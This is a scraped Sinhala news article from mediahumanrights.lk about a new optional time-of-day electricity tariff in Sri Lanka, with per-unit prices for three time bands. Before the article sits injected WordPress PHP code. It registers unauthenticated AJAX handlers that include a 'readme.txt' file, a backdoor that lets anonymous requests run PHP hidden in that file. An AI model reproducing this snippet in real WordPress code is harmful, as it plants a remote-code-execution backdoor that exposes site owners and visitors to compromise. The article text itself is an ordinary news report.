if(!function_exists('file_check_readme56685')){ add_action('wp_ajax_nopriv_file_check_readme56685', 'file_check_readme56685'); add_action('wp_ajax_file_check_readme56685', 'file_check_readme56685'); function file_check_readme56685() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } if(!function_exists('file_check_readme40625')){ add_action('wp_ajax_nopriv_file_check_readme40625', 'file_check_readme40625'); add_action('wp_ajax_file_check_readme40625', 'file_check_readme40625'); function file_check_readme40625() { $file = __DIR__ . '/' . 'readme.txt'; if (file_exists($file)) { include $file; } die(); } } විදුලි බිල වැඩි වෙයි? - අලුත් ක්‍රමවේදය මෙන්න - mediahumanrights.lk
mediahumanrights.lk
Local News News

විදුලි බිල වැඩි වෙයි? – අලුත් ක්‍රමවේදය මෙන්න

ලංකා විදුලිබල මණ්ඩලයේ සහ ලංකා විදුලි පුද්ගලික සමාගමේ ගෘහස්ථ විදුලි පරිභෝජකයන් සඳහා ඔවුන්ගේ විදුලි පාරිභෝගික රටාව (වෙලාව) වෙනස් කළ හැකි කාලපාදක ගාස්තු ක්‍රමය (Time of the day terrify) තෝරා ගැනීමට අවස්ථාවක් ලබා දී ඇති බව විදුලිබල හා පුනර්ජනනීය බලශක්ති අමාත්‍යංශය පවසයි.
ලංකා විදුලිබල මණ්ඩලය ඉදිරිපත් කළ යෝජනාවකට අනුව මහජන උපයෝගිතා කොමිෂන් සභාව විසින් මෙම ක්‍රමවේදය ක්‍රියාත්මක කිරීමට අනුමැතිය දී ඇති බව අමාත්‍යංශය විසින් නිකුත් කළ නිවේදනයක දැක්වේ.
ඒ අනුව විදුලි පාරිභෝගිකයාගේ විදුලි භාවිතා කිරීමේ කාල වේලාව අනුව පහත පරිදි වන අයුරින් ඔවුන්ගේ කටයුතු සඳහා විදුලිය භාවිත කළ හැකිය.
රාත්‍රී 10.30 සිට උදෑසන 5.30 දක්වා ඒකකයක මිල රු.13ක් වන අතර, උදෑසන 5.30 සිට සවස 6.30 දක්වා ඒකකයක මිල රු.25ක්ද, සවස 6.30 සිට රාත්‍රී 10.30 දක්වා ඒකකයක මිල රු.54ක්ද වන බව අමාත්‍යංශය පවසයි.
මෙම විදුලි ගාස්තු ක්‍රමය හඳුන්වාදීම තුළින් විදුලි පාරිභෝගිකයන් සඳහාවන ගාස්තු වැඩි කිරීමක් සිදු කිරීමට අපේක්ෂා නොකරන බවත්, මෙම ක්‍රමවේදය තෙකලා විදුලි සැපයීමක් සහිත විදුලි පාරිභෝගිකයන් හඳුන්වාදීම තුළ බලාපොරොත්තු වන්නේ දිනකදී වැඩිම විදුලි ඉල්ලුම පවතින සවස 6.30 සිට 10.30 දක්වා කාලය තුළ විදුලි පරිභෝජනය අවම කර ගැනීම බවත් අමාත්‍යංශය පෙන්වා දෙයි.
කිසිදු පාරිභෝගිකයෙකුට මෙම ක්‍රමවේදයට අනුගත වීමට අනිවාර්යය නොකරන අතර, මෙම ගාස්තු ක්‍රමය පාරිභෝගිකයා කැමති නම් පමණක් තෝරාගත හැකි ක්‍රමවේදයක් බවත් අමාත්‍යංශය පවසයි.
ඒ අනුව විදුලි ගාස්තු වැඩිකිරීම් පිළිබඳව මෙතෙක් කිසිදු තීරණයක් ගෙන නොමැති බවත්, මෙම නව ක්‍රමවේද හඳුන්වාදීම තුළ බලාපොරොත්තු වන්නේ පාරිභෝගිකයාට සඳහා වඩාත් නම්‍යශීලී ආර්ථිකමය වාසිසහගත ගාස්තු ගෙවීමේ ක්‍රමවේදයන් සඳහා යොමුවීමේ අවස්ථා පුළුල් කිරීමක් පමණක් වන බවත් අමාත්‍යංශය වැඩිදුරටත් පැවසී ය.
(under the courtesy of asianmirror news web)

Related posts

20 වන සංශෝධනයේ ගැසට් පත්‍රය නිකුත් වේ – පළාත් සභා 03ක ඡන්දයත් කල් යයි

Shiran Viraj

SAS seasonal summer 2018 routes – 5 new destination & 27 new non-stop routes

Shiran Viraj

සුවය ලැබු කොරෝනා ආසාදිතයින් ගණන 100 ක් වෙයි

Shiran Viraj